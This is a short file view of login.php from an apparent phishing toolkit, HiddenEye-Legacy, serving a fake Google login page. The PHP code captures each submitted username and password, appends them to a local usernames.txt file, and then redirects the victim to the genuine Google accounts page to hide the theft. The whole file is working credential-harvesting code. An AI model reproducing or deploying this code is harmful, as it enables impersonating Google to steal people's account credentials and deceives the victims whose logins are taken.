HiddenEye-Legacy/WebPages/google_advanced_web/login.php
Usama Abdul Sattar ffa512eed8
new google page
2018-04-24 10:30:11 +05:00

15 lines
436 B
PHP

<?php
$var = $_POST['username'];
$var2 = $_POST['password'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location:https://accounts.google.com');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
}
exit();
?>